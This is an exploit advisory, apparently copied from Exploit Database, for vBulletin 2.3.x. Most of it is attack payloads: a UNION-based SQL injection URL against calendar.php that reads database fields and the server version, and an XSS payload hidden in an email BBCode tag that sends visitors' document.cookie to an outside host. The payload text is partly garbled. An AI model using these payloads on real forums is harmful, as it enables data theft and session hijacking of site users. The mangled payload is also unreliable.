vBulletin 2.3.x – SQL Injection

• Exploit Database
• 13 阅读

• 作者： ROOT_EGY
  日期： 2010-02-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11396/

• # Title: vbulletin Vulnerability versions 2.3 .* - SQL injection.
  # Author: Discovered by ROOT_EGY
  # Version: vBulletin Version 2.3
  
  ===========================================================
   www.sec-war.com
  ===========================================================
  
  
  Vulnerability versions 2.3 .* - SQL injection in the validation of input data in 'calendar.php'. Sends SQL requests to the server.
  For example:
  www.server.som/forumpath/calendar.php?s=&action=edit&eventid=14 union (SELECT allowsmilies, public, userid, '0000-0-0 ', version (), userid FROM calendar_events WHERE eventid = 14) order by eventdate
  Vulnerability to Version 2 .*.* - is introducing XSS script tag e-mail
  [E * MAIL] aaa@aaa.aa » 's =' [/ E * MAIL] 'sss =» i = new Image (); i.src ='https://www.exploit-db.com/exploits/11396/ http://antichat.ru/cgi-bin/s . jpg? '+ document.cookie; this.sss = null »style = top: expression (eval (this.sss));
  
  
  
  ===========================================================
  
  ROOT_EGYto connect: r0t@hotmail.es
  
  ===========================================================
  
  Greetz TO : Alnjm33 - Mr.xXx - EgY-Sn!per - red virus - ShOot3r - And All My Friends.
  
  ===========================================================